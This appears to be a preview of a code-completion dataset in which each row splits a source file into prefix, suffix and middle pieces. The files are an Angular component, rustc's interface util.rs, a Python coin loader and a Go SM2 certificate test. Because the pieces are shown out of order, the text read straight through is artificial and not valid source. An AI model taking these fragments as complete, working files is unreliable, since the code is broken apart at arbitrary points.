file_name
stringlengths 3
137
| prefix
stringlengths 0
918k
| suffix
stringlengths 0
962k
| middle
stringlengths 0
812k
|
---|---|---|---|
app.component.ts | import { Component } from '@angular/core';
@Component({
selector: 'app-root',
templateUrl: './app.component.html',
styleUrls: ['./app.component.css']
}) | } | export class AppComponent {
nombre:string = 'Brayan';
apellido:string = "Laínez"; |
util.rs | use rustc_ast::mut_visit::{visit_clobber, MutVisitor, *};
use rustc_ast::ptr::P;
use rustc_ast::{self as ast, AttrVec, BlockCheckMode};
use rustc_codegen_ssa::traits::CodegenBackend;
use rustc_data_structures::fingerprint::Fingerprint;
use rustc_data_structures::fx::{FxHashMap, FxHashSet};
#[cfg(parallel_compiler)]
use rustc_data_structures::jobserver;
use rustc_data_structures::stable_hasher::StableHasher;
use rustc_data_structures::sync::Lrc;
use rustc_errors::registry::Registry;
use rustc_metadata::dynamic_lib::DynamicLibrary;
#[cfg(parallel_compiler)]
use rustc_middle::ty::tls;
use rustc_resolve::{self, Resolver};
use rustc_session as session;
use rustc_session::config::{self, CrateType};
use rustc_session::config::{ErrorOutputType, Input, OutputFilenames};
use rustc_session::lint::{self, BuiltinLintDiagnostics, LintBuffer};
use rustc_session::parse::CrateConfig;
use rustc_session::CrateDisambiguator;
use rustc_session::{early_error, filesearch, output, DiagnosticOutput, Session};
use rustc_span::edition::Edition;
use rustc_span::lev_distance::find_best_match_for_name;
use rustc_span::source_map::FileLoader;
use rustc_span::symbol::{sym, Symbol};
use smallvec::SmallVec;
use std::env;
use std::env::consts::{DLL_PREFIX, DLL_SUFFIX};
use std::io;
use std::lazy::SyncOnceCell;
use std::mem;
use std::ops::DerefMut;
#[cfg(not(parallel_compiler))]
use std::panic;
use std::path::{Path, PathBuf};
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::{Arc, Mutex, Once};
use std::thread;
use tracing::info;
/// Adds `target_feature = "..."` cfgs for a variety of platform
/// specific features (SSE, NEON etc.).
///
/// This is performed by checking whether a set of permitted features
/// is available on the target machine, by querying LLVM.
pub fn add_configuration(
cfg: &mut CrateConfig,
sess: &mut Session,
codegen_backend: &dyn CodegenBackend,
) {
let tf = sym::target_feature;
let target_features = codegen_backend.target_features(sess);
sess.target_features.extend(target_features.iter().cloned());
cfg.extend(target_features.into_iter().map(|feat| (tf, Some(feat))));
if sess.crt_static(None) {
cfg.insert((tf, Some(sym::crt_dash_static)));
}
}
pub fn create_session(
sopts: config::Options,
cfg: FxHashSet<(String, Option<String>)>,
diagnostic_output: DiagnosticOutput,
file_loader: Option<Box<dyn FileLoader + Send + Sync + 'static>>,
input_path: Option<PathBuf>,
lint_caps: FxHashMap<lint::LintId, lint::Level>,
make_codegen_backend: Option<
Box<dyn FnOnce(&config::Options) -> Box<dyn CodegenBackend> + Send>,
>,
descriptions: Registry,
) -> (Lrc<Session>, Lrc<Box<dyn CodegenBackend>>) {
let codegen_backend = if let Some(make_codegen_backend) = make_codegen_backend {
make_codegen_backend(&sopts)
} else {
get_codegen_backend(&sopts)
};
// target_override is documented to be called before init(), so this is okay
let target_override = codegen_backend.target_override(&sopts);
let mut sess = session::build_session(
sopts,
input_path,
descriptions,
diagnostic_output,
lint_caps,
file_loader,
target_override,
);
codegen_backend.init(&sess);
let mut cfg = config::build_configuration(&sess, config::to_crate_config(cfg));
add_configuration(&mut cfg, &mut sess, &*codegen_backend);
sess.parse_sess.config = cfg;
(Lrc::new(sess), Lrc::new(codegen_backend))
}
const STACK_SIZE: usize = 8 * 1024 * 1024;
fn get_stack_size() -> Option<usize> {
// FIXME: Hacks on hacks. If the env is trying to override the stack size
// then *don't* set it explicitly.
env::var_os("RUST_MIN_STACK").is_none().then_some(STACK_SIZE)
}
/// Like a `thread::Builder::spawn` followed by a `join()`, but avoids the need
/// for `'static` bounds.
#[cfg(not(parallel_compiler))]
pub fn scoped_thread<F: FnOnce() -> R + Send, R: Send>(cfg: thread::Builder, f: F) -> R {
struct Ptr(*mut ());
unsafe impl Send for Ptr {}
unsafe impl Sync for Ptr {}
let mut f = Some(f);
let run = Ptr(&mut f as *mut _ as *mut ());
let mut result = None;
let result_ptr = Ptr(&mut result as *mut _ as *mut ());
let thread = cfg.spawn(move || {
let run = unsafe { (*(run.0 as *mut Option<F>)).take().unwrap() };
let result = unsafe { &mut *(result_ptr.0 as *mut Option<R>) };
*result = Some(run());
});
match thread.unwrap().join() {
Ok(()) => result.unwrap(),
Err(p) => panic::resume_unwind(p),
}
}
#[cfg(not(parallel_compiler))]
pub fn setup_callbacks_and_run_in_thread_pool_with_globals<F: FnOnce() -> R + Send, R: Send>(
edition: Edition,
_threads: usize,
stderr: &Option<Arc<Mutex<Vec<u8>>>>,
f: F,
) -> R {
let mut cfg = thread::Builder::new().name("rustc".to_string());
if let Some(size) = get_stack_size() {
cfg = cfg.stack_size(size);
}
crate::callbacks::setup_callbacks();
let main_handler = move || {
rustc_span::with_session_globals(edition, || {
io::set_output_capture(stderr.clone());
f()
})
};
scoped_thread(cfg, main_handler)
}
/// Creates a new thread and forwards information in thread locals to it.
/// The new thread runs the deadlock handler.
/// Must only be called when a deadlock is about to happen.
#[cfg(parallel_compiler)]
unsafe fn handle_deadlock() {
let registry = rustc_rayon_core::Registry::current();
let context = tls::get_tlv();
assert!(context != 0);
rustc_data_structures::sync::assert_sync::<tls::ImplicitCtxt<'_, '_>>();
let icx: &tls::ImplicitCtxt<'_, '_> = &*(context as *const tls::ImplicitCtxt<'_, '_>);
let session_globals = rustc_span::SESSION_GLOBALS.with(|sg| sg as *const _);
let session_globals = &*session_globals;
thread::spawn(move || {
tls::enter_context(icx, |_| {
rustc_span::SESSION_GLOBALS
.set(session_globals, || tls::with(|tcx| tcx.queries.deadlock(tcx, ®istry)))
});
});
}
#[cfg(parallel_compiler)]
pub fn setup_callbacks_and_run_in_thread_pool_with_globals<F: FnOnce() -> R + Send, R: Send>(
edition: Edition,
threads: usize,
stderr: &Option<Arc<Mutex<Vec<u8>>>>,
f: F,
) -> R {
crate::callbacks::setup_callbacks();
let mut config = rayon::ThreadPoolBuilder::new()
.thread_name(|_| "rustc".to_string())
.acquire_thread_handler(jobserver::acquire_thread)
.release_thread_handler(jobserver::release_thread)
.num_threads(threads)
.deadlock_handler(|| unsafe { handle_deadlock() });
if let Some(size) = get_stack_size() {
config = config.stack_size(size);
}
let with_pool = move |pool: &rayon::ThreadPool| pool.install(f);
rustc_span::with_session_globals(edition, || {
rustc_span::SESSION_GLOBALS.with(|session_globals| {
// The main handler runs for each Rayon worker thread and sets up
// the thread local rustc uses. `session_globals` is captured and set
// on the new threads.
let main_handler = move |thread: rayon::ThreadBuilder| {
rustc_span::SESSION_GLOBALS.set(session_globals, || {
io::set_output_capture(stderr.clone());
thread.run()
})
};
config.build_scoped(main_handler, with_pool).unwrap()
})
})
}
fn load_backend_from_dylib(path: &Path) -> fn() -> Box<dyn CodegenBackend> {
let lib = DynamicLibrary::open(path).unwrap_or_else(|err| {
let err = format!("couldn't load codegen backend {:?}: {:?}", path, err);
early_error(ErrorOutputType::default(), &err);
});
unsafe {
match lib.symbol("__rustc_codegen_backend") {
Ok(f) => {
mem::forget(lib);
mem::transmute::<*mut u8, _>(f)
}
Err(e) => {
let err = format!(
"couldn't load codegen backend as it \
doesn't export the `__rustc_codegen_backend` \
symbol: {:?}",
e
);
early_error(ErrorOutputType::default(), &err);
}
}
}
}
pub fn get_codegen_backend(sopts: &config::Options) -> Box<dyn CodegenBackend> {
static INIT: Once = Once::new();
static mut LOAD: fn() -> Box<dyn CodegenBackend> = || unreachable!();
INIT.call_once(|| {
#[cfg(feature = "llvm")]
const DEFAULT_CODEGEN_BACKEND: &str = "llvm";
#[cfg(not(feature = "llvm"))]
const DEFAULT_CODEGEN_BACKEND: &str = "cranelift";
let codegen_name = sopts
.debugging_opts
.codegen_backend
.as_ref()
.map(|name| &name[..])
.unwrap_or(DEFAULT_CODEGEN_BACKEND);
let backend = match codegen_name {
filename if filename.contains('.') => load_backend_from_dylib(filename.as_ref()),
codegen_name => get_builtin_codegen_backend(codegen_name),
};
unsafe {
LOAD = backend;
}
});
unsafe { LOAD() }
}
// This is used for rustdoc, but it uses similar machinery to codegen backend
// loading, so we leave the code here. It is potentially useful for other tools
// that want to invoke the rustc binary while linking to rustc as well.
pub fn rustc_path<'a>() -> Option<&'a Path> {
static RUSTC_PATH: SyncOnceCell<Option<PathBuf>> = SyncOnceCell::new();
const BIN_PATH: &str = env!("RUSTC_INSTALL_BINDIR");
RUSTC_PATH.get_or_init(|| get_rustc_path_inner(BIN_PATH)).as_ref().map(|v| &**v)
}
fn get_rustc_path_inner(bin_path: &str) -> Option<PathBuf> {
sysroot_candidates().iter().find_map(|sysroot| {
let candidate = sysroot.join(bin_path).join(if cfg!(target_os = "windows") {
"rustc.exe"
} else {
"rustc"
});
candidate.exists().then_some(candidate)
})
}
fn sysroot_candidates() -> Vec<PathBuf> {
let target = session::config::host_triple();
let mut sysroot_candidates = vec![filesearch::get_or_default_sysroot()];
let path = current_dll_path().and_then(|s| s.canonicalize().ok());
if let Some(dll) = path {
// use `parent` twice to chop off the file name and then also the
// directory containing the dll which should be either `lib` or `bin`.
if let Some(path) = dll.parent().and_then(|p| p.parent()) {
// The original `path` pointed at the `rustc_driver` crate's dll.
// Now that dll should only be in one of two locations. The first is
// in the compiler's libdir, for example `$sysroot/lib/*.dll`. The
// other is the target's libdir, for example
// `$sysroot/lib/rustlib/$target/lib/*.dll`.
//
// We don't know which, so let's assume that if our `path` above
// ends in `$target` we *could* be in the target libdir, and always
// assume that we may be in the main libdir.
sysroot_candidates.push(path.to_owned());
if path.ends_with(target) {
sysroot_candidates.extend(
path.parent() // chop off `$target`
.and_then(|p| p.parent()) // chop off `rustlib`
.and_then(|p| p.parent()) // chop off `lib`
.map(|s| s.to_owned()),
);
}
}
}
return sysroot_candidates;
#[cfg(unix)]
fn current_dll_path() -> Option<PathBuf> {
use std::ffi::{CStr, OsStr};
use std::os::unix::prelude::*;
unsafe {
let addr = current_dll_path as usize as *mut _;
let mut info = mem::zeroed();
if libc::dladdr(addr, &mut info) == 0 {
info!("dladdr failed");
return None;
}
if info.dli_fname.is_null() {
info!("dladdr returned null pointer");
return None;
}
let bytes = CStr::from_ptr(info.dli_fname).to_bytes();
let os = OsStr::from_bytes(bytes);
Some(PathBuf::from(os))
}
}
#[cfg(windows)]
fn current_dll_path() -> Option<PathBuf> {
use std::ffi::OsString;
use std::os::windows::prelude::*;
use std::ptr;
use winapi::um::libloaderapi::{
GetModuleFileNameW, GetModuleHandleExW, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS,
};
unsafe {
let mut module = ptr::null_mut();
let r = GetModuleHandleExW(
GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS,
current_dll_path as usize as *mut _,
&mut module,
);
if r == 0 {
info!("GetModuleHandleExW failed: {}", io::Error::last_os_error());
return None;
}
let mut space = Vec::with_capacity(1024);
let r = GetModuleFileNameW(module, space.as_mut_ptr(), space.capacity() as u32);
if r == 0 {
info!("GetModuleFileNameW failed: {}", io::Error::last_os_error());
return None;
}
let r = r as usize;
if r >= space.capacity() {
info!("our buffer was too small? {}", io::Error::last_os_error());
return None;
}
space.set_len(r);
let os = OsString::from_wide(&space);
Some(PathBuf::from(os))
}
}
}
pub fn get_builtin_codegen_backend(backend_name: &str) -> fn() -> Box<dyn CodegenBackend> {
match backend_name {
#[cfg(feature = "llvm")]
"llvm" => rustc_codegen_llvm::LlvmCodegenBackend::new,
_ => get_codegen_sysroot(backend_name),
}
}
pub fn get_codegen_sysroot(backend_name: &str) -> fn() -> Box<dyn CodegenBackend> {
// For now we only allow this function to be called once as it'll dlopen a
// few things, which seems to work best if we only do that once. In
// general this assertion never trips due to the once guard in `get_codegen_backend`,
// but there's a few manual calls to this function in this file we protect
// against.
static LOADED: AtomicBool = AtomicBool::new(false);
assert!(
!LOADED.fetch_or(true, Ordering::SeqCst),
"cannot load the default codegen backend twice"
);
let target = session::config::host_triple();
let sysroot_candidates = sysroot_candidates();
let sysroot = sysroot_candidates
.iter()
.map(|sysroot| {
let libdir = filesearch::relative_target_lib_path(&sysroot, &target);
sysroot.join(libdir).with_file_name("codegen-backends")
})
.find(|f| {
info!("codegen backend candidate: {}", f.display());
f.exists()
});
let sysroot = sysroot.unwrap_or_else(|| {
let candidates = sysroot_candidates
.iter()
.map(|p| p.display().to_string())
.collect::<Vec<_>>()
.join("\n* ");
let err = format!(
"failed to find a `codegen-backends` folder \
in the sysroot candidates:\n* {}",
candidates
);
early_error(ErrorOutputType::default(), &err);
});
info!("probing {} for a codegen backend", sysroot.display());
let d = sysroot.read_dir().unwrap_or_else(|e| {
let err = format!(
"failed to load default codegen backend, couldn't \
read `{}`: {}",
sysroot.display(),
e
);
early_error(ErrorOutputType::default(), &err);
});
let mut file: Option<PathBuf> = None;
let expected_name =
format!("rustc_codegen_{}-{}", backend_name, release_str().expect("CFG_RELEASE"));
for entry in d.filter_map(|e| e.ok()) {
let path = entry.path();
let filename = match path.file_name().and_then(|s| s.to_str()) {
Some(s) => s,
None => continue,
};
if !(filename.starts_with(DLL_PREFIX) && filename.ends_with(DLL_SUFFIX)) {
continue;
}
let name = &filename[DLL_PREFIX.len()..filename.len() - DLL_SUFFIX.len()];
if name != expected_name {
continue;
}
if let Some(ref prev) = file {
let err = format!(
"duplicate codegen backends found\n\
first: {}\n\
second: {}\n\
",
prev.display(),
path.display()
);
early_error(ErrorOutputType::default(), &err);
}
file = Some(path.clone());
}
match file {
Some(ref s) => load_backend_from_dylib(s),
None => {
let err = format!("unsupported builtin codegen backend `{}`", backend_name);
early_error(ErrorOutputType::default(), &err);
}
}
}
pub(crate) fn compute_crate_disambiguator(session: &Session) -> CrateDisambiguator {
use std::hash::Hasher;
// The crate_disambiguator is a 128 bit hash. The disambiguator is fed
// into various other hashes quite a bit (symbol hashes, incr. comp. hashes,
// debuginfo type IDs, etc), so we don't want it to be too wide. 128 bits
// should still be safe enough to avoid collisions in practice.
let mut hasher = StableHasher::new();
let mut metadata = session.opts.cg.metadata.clone();
// We don't want the crate_disambiguator to dependent on the order
// -C metadata arguments, so sort them:
metadata.sort();
// Every distinct -C metadata value is only incorporated once:
metadata.dedup();
hasher.write(b"metadata");
for s in &metadata {
// Also incorporate the length of a metadata string, so that we generate
// different values for `-Cmetadata=ab -Cmetadata=c` and
// `-Cmetadata=a -Cmetadata=bc`
hasher.write_usize(s.len());
hasher.write(s.as_bytes());
}
// Also incorporate crate type, so that we don't get symbol conflicts when
// linking against a library of the same name, if this is an executable.
let is_exe = session.crate_types().contains(&CrateType::Executable);
hasher.write(if is_exe { b"exe" } else { b"lib" });
CrateDisambiguator::from(hasher.finish::<Fingerprint>())
}
pub(crate) fn check_attr_crate_type(
sess: &Session,
attrs: &[ast::Attribute],
lint_buffer: &mut LintBuffer,
) {
// Unconditionally collect crate types from attributes to make them used
for a in attrs.iter() {
if sess.check_name(a, sym::crate_type) {
if let Some(n) = a.value_str() {
if categorize_crate_type(n).is_some() {
return;
}
if let ast::MetaItemKind::NameValue(spanned) = a.meta().unwrap().kind {
let span = spanned.span;
let lev_candidate = find_best_match_for_name(
&CRATE_TYPES.iter().map(|(k, _)| *k).collect::<Vec<_>>(),
n,
None,
);
if let Some(candidate) = lev_candidate {
lint_buffer.buffer_lint_with_diagnostic(
lint::builtin::UNKNOWN_CRATE_TYPES,
ast::CRATE_NODE_ID,
span,
"invalid `crate_type` value",
BuiltinLintDiagnostics::UnknownCrateTypes(
span,
"did you mean".to_string(),
format!("\"{}\"", candidate),
),
);
} else {
lint_buffer.buffer_lint(
lint::builtin::UNKNOWN_CRATE_TYPES,
ast::CRATE_NODE_ID,
span,
"invalid `crate_type` value",
);
}
}
}
}
}
}
const CRATE_TYPES: &[(Symbol, CrateType)] = &[
(sym::rlib, CrateType::Rlib),
(sym::dylib, CrateType::Dylib),
(sym::cdylib, CrateType::Cdylib),
(sym::lib, config::default_lib_output()),
(sym::staticlib, CrateType::Staticlib),
(sym::proc_dash_macro, CrateType::ProcMacro),
(sym::bin, CrateType::Executable),
];
fn categorize_crate_type(s: Symbol) -> Option<CrateType> {
Some(CRATE_TYPES.iter().find(|(key, _)| *key == s)?.1)
}
pub fn collect_crate_types(session: &Session, attrs: &[ast::Attribute]) -> Vec<CrateType> {
// Unconditionally collect crate types from attributes to make them used
let attr_types: Vec<CrateType> = attrs
.iter()
.filter_map(|a| {
if session.check_name(a, sym::crate_type) {
match a.value_str() {
Some(s) => categorize_crate_type(s),
_ => None,
}
} else {
None
}
})
.collect();
// If we're generating a test executable, then ignore all other output
// styles at all other locations
if session.opts.test {
return vec![CrateType::Executable];
}
// Only check command line flags if present. If no types are specified by
// command line, then reuse the empty `base` Vec to hold the types that
// will be found in crate attributes.
let mut base = session.opts.crate_types.clone();
if base.is_empty() {
base.extend(attr_types);
if base.is_empty() {
base.push(output::default_output_for_target(session));
} else {
base.sort();
base.dedup();
}
}
base.retain(|crate_type| {
let res = !output::invalid_output_for_target(session, *crate_type);
if !res {
session.warn(&format!(
"dropping unsupported crate type `{}` for target `{}`",
*crate_type, session.opts.target_triple
));
}
res
});
base
}
pub fn build_output_filenames(
input: &Input,
odir: &Option<PathBuf>,
ofile: &Option<PathBuf>,
attrs: &[ast::Attribute],
sess: &Session,
) -> OutputFilenames {
match *ofile {
None => {
// "-" as input file will cause the parser to read from stdin so we
// have to make up a name
// We want to toss everything after the final '.'
let dirpath = (*odir).as_ref().cloned().unwrap_or_default();
// If a crate name is present, we use it as the link name
let stem = sess
.opts
.crate_name
.clone()
.or_else(|| rustc_attr::find_crate_name(&sess, attrs).map(|n| n.to_string()))
.unwrap_or_else(|| input.filestem().to_owned());
OutputFilenames::new(
dirpath,
stem,
None,
sess.opts.cg.extra_filename.clone(),
sess.opts.output_types.clone(),
)
}
Some(ref out_file) => {
let unnamed_output_types =
sess.opts.output_types.values().filter(|a| a.is_none()).count();
let ofile = if unnamed_output_types > 1 {
sess.warn(
"due to multiple output types requested, the explicitly specified \
output file name will be adapted for each output type",
);
None
} else {
if !sess.opts.cg.extra_filename.is_empty() {
sess.warn("ignoring -C extra-filename flag due to -o flag");
}
Some(out_file.clone())
};
if *odir != None {
sess.warn("ignoring --out-dir flag due to -o flag");
}
OutputFilenames::new(
out_file.parent().unwrap_or_else(|| Path::new("")).to_path_buf(),
out_file.file_stem().unwrap_or_default().to_str().unwrap().to_string(),
ofile,
sess.opts.cg.extra_filename.clone(),
sess.opts.output_types.clone(),
)
}
}
}
// Note: Also used by librustdoc, see PR #43348. Consider moving this struct elsewhere.
//
// FIXME: Currently the `everybody_loops` transformation is not applied to:
// * `const fn`, due to issue #43636 that `loop` is not supported for const evaluation. We are
// waiting for miri to fix that.
// * `impl Trait`, due to issue #43869 that functions returning impl Trait cannot be diverging.
// Solving this may require `!` to implement every trait, which relies on the an even more
// ambitious form of the closed RFC #1637. See also [#34511].
//
// [#34511]: https://github.com/rust-lang/rust/issues/34511#issuecomment-322340401
pub struct ReplaceBodyWithLoop<'a, 'b> {
within_static_or_const: bool,
nested_blocks: Option<Vec<ast::Block>>,
resolver: &'a mut Resolver<'b>,
}
impl<'a, 'b> ReplaceBodyWithLoop<'a, 'b> {
pub fn new(resolver: &'a mut Resolver<'b>) -> ReplaceBodyWithLoop<'a, 'b> {
ReplaceBodyWithLoop { within_static_or_const: false, nested_blocks: None, resolver }
}
fn run<R, F: FnOnce(&mut Self) -> R>(&mut self, is_const: bool, action: F) -> R {
let old_const = mem::replace(&mut self.within_static_or_const, is_const);
let old_blocks = self.nested_blocks.take();
let ret = action(self);
self.within_static_or_const = old_const;
self.nested_blocks = old_blocks;
ret
}
fn should_ignore_fn(ret_ty: &ast::FnRetTy) -> bool {
if let ast::FnRetTy::Ty(ref ty) = ret_ty {
fn involves_impl_trait(ty: &ast::Ty) -> bool {
match ty.kind {
ast::TyKind::ImplTrait(..) => true,
ast::TyKind::Slice(ref subty)
| ast::TyKind::Array(ref subty, _)
| ast::TyKind::Ptr(ast::MutTy { ty: ref subty, .. })
| ast::TyKind::Rptr(_, ast::MutTy { ty: ref subty, .. })
| ast::TyKind::Paren(ref subty) => involves_impl_trait(subty),
ast::TyKind::Tup(ref tys) => any_involves_impl_trait(tys.iter()),
ast::TyKind::Path(_, ref path) => {
path.segments.iter().any(|seg| match seg.args.as_deref() {
None => false,
Some(&ast::GenericArgs::AngleBracketed(ref data)) => {
data.args.iter().any(|arg| match arg {
ast::AngleBracketedArg::Arg(arg) => match arg {
ast::GenericArg::Type(ty) => involves_impl_trait(ty),
ast::GenericArg::Lifetime(_)
| ast::GenericArg::Const(_) => false,
},
ast::AngleBracketedArg::Constraint(c) => match c.kind {
ast::AssocTyConstraintKind::Bound { .. } => true,
ast::AssocTyConstraintKind::Equality { ref ty } => {
involves_impl_trait(ty)
}
},
})
}
Some(&ast::GenericArgs::Parenthesized(ref data)) => {
any_involves_impl_trait(data.inputs.iter())
|| ReplaceBodyWithLoop::should_ignore_fn(&data.output)
}
})
}
_ => false,
}
}
fn any_involves_impl_trait<'a, I: Iterator<Item = &'a P<ast::Ty>>>(mut it: I) -> bool {
it.any(|subty| involves_impl_trait(subty))
}
involves_impl_trait(ty)
} else {
false
}
}
fn is_sig_const(sig: &ast::FnSig) -> bool {
matches!(sig.header.constness, ast::Const::Yes(_))
|| ReplaceBodyWithLoop::should_ignore_fn(&sig.decl.output)
}
}
impl<'a> MutVisitor for ReplaceBodyWithLoop<'a, '_> {
fn visit_item_kind(&mut self, i: &mut ast::ItemKind) {
let is_const = match i {
ast::ItemKind::Static(..) | ast::ItemKind::Const(..) => true,
ast::ItemKind::Fn(box ast::FnKind(_, ref sig, _, _)) => Self::is_sig_const(sig),
_ => false,
};
self.run(is_const, |s| noop_visit_item_kind(i, s))
}
fn flat_map_trait_item(&mut self, i: P<ast::AssocItem>) -> SmallVec<[P<ast::AssocItem>; 1]> {
let is_const = match i.kind {
ast::AssocItemKind::Const(..) => true,
ast::AssocItemKind::Fn(box ast::FnKind(_, ref sig, _, _)) => Self::is_sig_const(sig),
_ => false,
};
self.run(is_const, |s| noop_flat_map_assoc_item(i, s))
}
fn flat_map_impl_item(&mut self, i: P<ast::AssocItem>) -> SmallVec<[P<ast::AssocItem>; 1]> {
self.flat_map_trait_item(i)
}
fn visit_anon_const(&mut self, c: &mut ast::AnonConst) {
self.run(true, |s| noop_visit_anon_const(c, s))
}
fn visit_block(&mut self, b: &mut P<ast::Block>) {
fn | (
rules: ast::BlockCheckMode,
s: Option<ast::Stmt>,
resolver: &mut Resolver<'_>,
) -> ast::Block {
ast::Block {
stmts: s.into_iter().collect(),
rules,
id: resolver.next_node_id(),
span: rustc_span::DUMMY_SP,
tokens: None,
}
}
fn block_to_stmt(b: ast::Block, resolver: &mut Resolver<'_>) -> ast::Stmt {
let expr = P(ast::Expr {
id: resolver.next_node_id(),
kind: ast::ExprKind::Block(P(b), None),
span: rustc_span::DUMMY_SP,
attrs: AttrVec::new(),
tokens: None,
});
ast::Stmt {
id: resolver.next_node_id(),
kind: ast::StmtKind::Expr(expr),
span: rustc_span::DUMMY_SP,
}
}
let empty_block = stmt_to_block(BlockCheckMode::Default, None, self.resolver);
let loop_expr = P(ast::Expr {
kind: ast::ExprKind::Loop(P(empty_block), None),
id: self.resolver.next_node_id(),
span: rustc_span::DUMMY_SP,
attrs: AttrVec::new(),
tokens: None,
});
let loop_stmt = ast::Stmt {
id: self.resolver.next_node_id(),
span: rustc_span::DUMMY_SP,
kind: ast::StmtKind::Expr(loop_expr),
};
if self.within_static_or_const {
noop_visit_block(b, self)
} else {
visit_clobber(b.deref_mut(), |b| {
let mut stmts = vec![];
for s in b.stmts {
let old_blocks = self.nested_blocks.replace(vec![]);
stmts.extend(self.flat_map_stmt(s).into_iter().filter(|s| s.is_item()));
// we put a Some in there earlier with that replace(), so this is valid
let new_blocks = self.nested_blocks.take().unwrap();
self.nested_blocks = old_blocks;
stmts.extend(new_blocks.into_iter().map(|b| block_to_stmt(b, self.resolver)));
}
let mut new_block = ast::Block { stmts, ..b };
if let Some(old_blocks) = self.nested_blocks.as_mut() {
//push our fresh block onto the cache and yield an empty block with `loop {}`
if !new_block.stmts.is_empty() {
old_blocks.push(new_block);
}
stmt_to_block(b.rules, Some(loop_stmt), &mut self.resolver)
} else {
//push `loop {}` onto the end of our fresh block and yield that
new_block.stmts.push(loop_stmt);
new_block
}
})
}
}
}
/// Returns a version string such as "rustc 1.46.0 (04488afe3 2020-08-24)"
pub fn version_str() -> Option<&'static str> {
option_env!("CFG_VERSION")
}
/// Returns a version string such as "0.12.0-dev".
pub fn release_str() -> Option<&'static str> {
option_env!("CFG_RELEASE")
}
/// Returns the full SHA1 hash of HEAD of the Git repo from which rustc was built.
pub fn commit_hash_str() -> Option<&'static str> {
option_env!("CFG_VER_HASH")
}
/// Returns the "commit date" of HEAD of the Git repo from which rustc was built as a static string.
pub fn commit_date_str() -> Option<&'static str> {
option_env!("CFG_VER_DATE")
}
| stmt_to_block |
loader.py | import enum
import functools
from typing import Dict, Type
from electrum_gui.common.basic import bip44
from electrum_gui.common.coin import data
from electrum_gui.common.conf import chains as chains_conf
from electrum_gui.common.secret import data as secret_data
CHAINS_DICT = {}
COINS_DICT = {}
def _replace_enum_fields(raw_data: dict, fields: Dict[str, Type[enum.Enum]]):
|
def refresh_coins(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
global COINS_DICT
added_coins = chains_conf.get_added_coins(set(COINS_DICT.keys()))
if added_coins:
for coin in added_coins:
coininfo = data.CoinInfo(**coin)
COINS_DICT.setdefault(coininfo.code, coininfo)
return func(*args, **kwargs)
return wrapper
def refresh_chains(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
global CHAINS_DICT
for chain in chains_conf.get_added_chains(set(CHAINS_DICT.keys())):
_replace_enum_fields(
chain,
{
"chain_model": data.ChainModel,
"curve": secret_data.CurveEnum,
"bip44_last_hardened_level": bip44.BIP44Level,
"bip44_auto_increment_level": bip44.BIP44Level,
"bip44_target_level": bip44.BIP44Level,
},
)
chaininfo = data.ChainInfo(**chain)
CHAINS_DICT.setdefault(chaininfo.chain_code, chaininfo)
return func(*args, **kwargs)
return wrapper
| for field_name, enum_cls in fields.items():
if field_name not in raw_data:
continue
enum_name = raw_data[field_name].upper()
enum_ins = enum_cls[enum_name]
raw_data[field_name] = enum_ins |
x509_test.go | /*
Copyright IBM Corp. 2017 All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/ |
package gmutil
import (
"crypto/rand"
"encoding/asn1"
"github.com/chinaso/fabricGM/cryptopkg/golangGM/sm2"
"github.com/chinaso/fabricGM/cryptopkg/golangGM/x509"
"crypto/x509/pkix"
"math/big"
"net"
"testing"
"time"
"github.com/stretchr/testify/assert"
)
func TestDERToX509Certificate(t *testing.T) {
testExtKeyUsage := []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth, x509.ExtKeyUsageServerAuth}
testUnknownExtKeyUsage := []asn1.ObjectIdentifier{[]int{1, 2, 3}, []int{2, 59, 1}}
extraExtensionData := []byte("extra extension")
commonName := "test.example.com"
template := x509.Certificate{
SerialNumber: big.NewInt(1),
Subject: pkix.Name{
CommonName: commonName,
Organization: []string{"Σ Acme Co"},
Country: []string{"US"},
ExtraNames: []pkix.AttributeTypeAndValue{
{
Type: []int{2, 5, 4, 42},
Value: "Gopher",
},
// This should override the Country, above.
{
Type: []int{2, 5, 4, 6},
Value: "NL",
},
},
},
NotBefore: time.Now().Add(-1 * time.Hour),
NotAfter: time.Now().Add(1 * time.Hour),
//SignatureAlgorithm: x509.ECDSAWithSHA256,
SignatureAlgorithm: x509.SM2WithSM3,
SubjectKeyId: []byte{1, 2, 3, 4},
KeyUsage: x509.KeyUsageCertSign,
ExtKeyUsage: testExtKeyUsage,
UnknownExtKeyUsage: testUnknownExtKeyUsage,
BasicConstraintsValid: true,
IsCA: true,
OCSPServer: []string{"http://ocurrentBCCSP.example.com"},
IssuingCertificateURL: []string{"http://crt.example.com/ca1.crt"},
DNSNames: []string{"test.example.com"},
EmailAddresses: []string{"[email protected]"},
IPAddresses: []net.IP{net.IPv4(127, 0, 0, 1).To4(), net.ParseIP("2001:4860:0:2001::68")},
PolicyIdentifiers: []asn1.ObjectIdentifier{[]int{1, 2, 3}},
PermittedDNSDomains: []string{".example.com", "example.com"},
CRLDistributionPoints: []string{"http://crl1.example.com/ca1.crl", "http://crl2.example.com/ca1.crl"},
ExtraExtensions: []pkix.Extension{
{
Id: []int{1, 2, 3, 4},
Value: extraExtensionData,
},
},
}
key, err := sm2.GenerateKey(rand.Reader)
assert.NoError(t, err)
certRaw, err := x509.CreateCertificate(rand.Reader, &template, &template,key.Public(),key)
assert.NoError(t, err)
cert, err := DERToX509Certificate(certRaw)
assert.NoError(t, err)
assert.NotNil(t, cert)
assert.Equal(t, cert.Raw, certRaw)
} | |
wal.rs | // Copyright 2020-2021, The Tremor Team
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
